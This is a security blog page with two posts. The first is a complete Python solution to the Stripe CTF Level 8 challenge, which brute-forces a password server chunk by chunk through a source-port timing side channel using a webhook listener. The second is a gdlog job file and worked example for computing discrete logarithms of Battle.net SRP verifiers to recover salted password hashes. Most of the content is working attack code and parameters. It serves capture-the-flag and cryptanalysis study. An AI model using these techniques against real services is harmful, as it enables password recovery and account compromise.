codezen.fr code hacking, zen coding

30 Aug 2012

Stripe CTF Level 8 Solution

Posted by aXs

Quick solution post for Stripe's CTF Level 8 before leaving for vacation.

#!/usr/bin/env python
# aXs - http://codezen.fr
#
# Stripe CTF Level 8

import time
import requests
import socket
import threading
import SocketServer
import Queue
import json
import random
import sys

remote_port = 0

q = Queue.Queue(maxsize=0)

class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):

  def handle(self):
    global remote_port
    data = self.request.recv(1024)
    client_ip, client_port = self.client_address
    #print client_ip, client_port
    delta = client_port - remote_port
    remote_port = client_port
    self.request.close()
    q.put(delta)

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
  pass

if __name__ == "__main__":
  # Port 0 means to select an arbitrary unused port
  HOST, PORT = "0.0.0.0", 0

  server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
  ip, port = server.server_address

  server_thread = threading.Thread(target=server.serve_forever)
  server_thread.daemon = True
  server_thread.start()
  print "Server loop running in thread:", server_thread.name

  endpoint = "https://level08-3.stripe-ctf.com/user-oxtxhpbwuz/"

  numbers = range(0,1000)
  random.shuffle(numbers)

  #numbers = ['641', '243', '093', '589', '728']

  candidate = []

  chunk = 1 # increment after each found chunk
  found = "" # add found chunk here
  level2_ip = "10.0.2.134"

  while len(numbers):
    i = int(numbers.pop())
    print "Moving to " + str(i)
    guess = str(i).zfill(3)
    body = '{"password": "' + found + str(guess) + 'A'*((4-chunk)*3) + '", "webhooks": ["' + level2_ip + ':'+str(port)+'"]}'

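    delta = 0
    # Repeat the request until the measured source-port delta falls within 1..chunk+2
    while delta>(chunk+2) or delta<1:
      resp = requests.post(endpoint, data=body)
      delta = q.get()
      result = json.loads(resp.text)
      print resp.text, result
      if result['success'] == True: # true for last chunk only
        print "WIIIIIIIIN"
        sys.exit()

    # A delta of exactly chunk+2 marks this guess as a candidate for the current chunk
    if delta == (chunk+2):
      print "CANDIDATE=", guess, resp.text
      candidate.append(guess)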

    print guess + "|" + str(delta)

  print repr(candidate)

  server.shutdown()
12 Aug 2012

Sample gdlog job file for Battle.net SRP

Posted by aXs

[Update 12 Aug: I tuned the spStep parameters to generate more relations. Otherwise solving may fail for some targets.]

See RFC 2945 for details on SRP and this reference for Blizzard's specific implementation.

g is the well-known value 47

p is the well-known N: 112624315653284427036559548610503669920632123929604336254260115573677366691719

q = (p-1)/2

t (target) is your verifier v, such that v = g^x % N

gdlog will give you back a 160-bit x, the salted SHA1 of the username and password: x = SHA1(s, SHA1(C, ":", P))

Our gdlog job file is like this:

p: 112624315653284427036559548610503669920632123929604336254260115573677366691719
q: 56312157826642213518279774305251834960316061964802168127130057786838683345859
job:srp
sieveType:page

f0:[ -23817613149476351568408250 7348740330559081441686124 5493570054426813646951125 ]
f1:[ 98 -9 -98 1 ]
m: 3430716947829154018307671961632018816844127594664356203325504368794740097415
skew: 1
# Alpha(f0)=-1.13722 Alpha(f1)=-0.0396682
# E(f0)=0.00028881 E(f1)=1000
# I(f0, S)=58.2395 I(f1, S)=3.99381
# Pair rating =0.00028881
b0:135090
b1:270181
lpb0:337725
lpb1:675452
lpf2exp0: 37
lpf2exp1:39
err_log0:36
err_log1:38
sp0:135090
sp1:202635
spi:0
spStep:100000
lc0Fact:[3 5 5 5 7 11 190253508378417788639]
p1Fact:[2 56312157826642213518279774305251834960316061964802168127130057786838683345859]
t:35873932978976964289906001423519899977549558494468550338642058985871400867383
g:47

Example:

Generate SRP handshake:

g= 47
N= 112624315653284427036559548610503669920632123929604336254260115573677366691719
x= 1424247726466781758056184792317997759091651621231
username:breith
password: ouille
salt: 0x101010101010101010101010101010101010101010101010101010101010101L
v: 0x2847f9a6e5ece61e8c97edd6e0e8d527d0c59991c4f69dcae63aae948b629cd1L

gdlog gives back, after 2 hours on a quad-core i5, for this v:

Logarithm of the 18219683119335387768214778163247823001174424798682531185510722886446717508817 to the 47 is 1424247726466781758056184792317997759091651621231

1424247726466781758056184792317997759091651621231 is indeed our x
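
A quick way to sanity-check the job file's group parameters and the logarithm gdlog returns, as an added example (not part of the original post or of gdlog). The function names are this example's own; the numeric values are copied from the post.

```python
# Added example: consistency checks for a gdlog job file and its result.
# JOB holds the p, q and g lines from the post; V and X are the post's example
# verifier and recovered exponent.
JOB = """\
p: 112624315653284427036559548610503669920632123929604336254260115573677366691719
q: 56312157826642213518279774305251834960316061964802168127130057786838683345859
g:47
"""
V = 0x2847f9a6e5ece61e8c97edd6e0e8d527d0c59991c4f69dcae63aae948b629cd1
X = 1424247726466781758056184792317997759091651621231


def parse_job(text):
    """Return the integer-valued 'key: value' lines of a job file as a dict."""
    params = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        value = value.strip()
        if sep and value.isdigit():
            params[key.strip()] = int(value)
    return params


def check_group(params):
    """Check that the job file's group parameters are mutually consistent."""
    p, q, g = params["p"], params["q"], params["g"]
    return {
        "q_is_half_p_minus_1": 2 * q + 1 == p,
        "g_in_range": 1 < g < p - 1,
        # The order of g divides p-1 = 2q; g^q == 1 puts g in the order-q subgroup.
        "g_in_order_q_subgroup": pow(g, q, p) == 1,
    }


def check_log(params, target, x, hash_bits=160):
    """Confirm a claimed logarithm and that it is the unique hash-sized one."""
    p, q, g = params["p"], params["q"], params["g"]
    return {
        "reproduces_target": pow(g, x, p) == target,
        "fits_hash_size": 0 <= x < 2 ** hash_bits,
        # With q prime, an exponent below q has no smaller alias: x is the hash itself.
        "unique_below_q": x < q,
    }


if __name__ == "__main__":
    job = parse_job(JOB)
    print(check_group(job))
    print(check_log(job, V, X))
```

If `g_in_order_q_subgroup` comes back False, g generates the full group of order 2q; an exponent below q is still unique in that case.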
